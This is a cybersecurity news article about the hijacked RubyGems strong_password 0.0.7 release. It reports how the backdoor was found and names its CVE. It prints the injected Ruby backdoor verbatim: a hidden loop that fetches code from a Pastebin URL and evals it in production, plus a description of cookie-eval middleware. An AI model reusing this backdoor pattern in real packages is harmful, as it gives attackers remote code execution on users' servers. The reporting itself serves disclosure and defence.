Thursday, January 23, 2025
HomeInternetRubyGems strong_password Library Hijacked by Threat Actors

RubyGems strong_password Library Hijacked by Threat Actors

Published on

SIEM as a Service

Follow Us on Google News

Ruby users who updated with strong_password gem version 0.0.7 are urged to roll back to the previous versions after a developer discovered the malicious code in the gem.

The developer named Tute Costa who noticed the inclusion of backdoor while performing regular security audits. He spotted the changes with strong_password on gem hosting service, but not with any branch in GitHub.

“It appeared to have gone from 0.0.6 to 0.0.7, yet the last change in any branch in GitHub was from 6 months ago, and we were up to date with those.”The Strong_password is gem used by developers to check the password strength of the apps.

The strong_password v 0.0.6 was downloaded more than 38,000 times and the backdoored version 0.0.7 was downloaded 537 times.

He further downloaded the gem from Rubygems and compared to the copy in GitHub, following code was added with the latest version and change was appended from a different account than the maintainer’s one.

def !;begin;yield;rescue Exception;end;end 
!{Thread.new{loop{_!{sleep
rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if
Rails.env[0]=="p"}

According to the code, it appears attackers use Pastebin to download the secondary payload, the code runs only if it is running in a production environment with an empty exception.

The attack also injects a middleware that “eval‘s cookies named with an __id suffix, only in production, all surrounded by the empty exception handler! a function that’s defined in the hijacked gem.”

The vulnerability has been assigned with CVE identifier CVE-2019-13354. A newer version 0.0.8 of ruby gem with the clean code is released and the details can be seen from the official page of RubyGems.

Download: Free GDPR Comics Book – Importance of Following General Data Protection Regulation (GDPR) to protect your Company Data and user privacy

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

Critical DLL Hijacking Vulnerability in PC-Doctor For Windows Let Hackers Attack Hundreds of Million DELL Computers

Account Take over Vulnerability in EA Origin Game Client Let Hackers Hijack the 300 Million Gamers Account

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

Nnice Ransomware Attacking Windows Systems With Advanced Encryption Techniques

CYFIRMA's Research and Advisory team has identified a new strain of ransomware labeled "Nnice,"...

Microsoft Unveils New Identity Secure Score Recommendations in General Availability

Microsoft has announced the general availability of 11 new Identity Secure Score recommendations in...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

SonicWall Arbitrary OS Commands Execution Vulnerability Exploited in Attacks

 A critical vulnerability in SonicWall's SMA1000 series tracked as CVE-2025-23006, has come under active exploitation...

Murdoc Botnet Exploiting AVTECH Cameras & Huawei Routers to Gain Complete Control

Researchers have identified an active malware campaign involving a Mirai botnet variant, dubbed Murdoc,...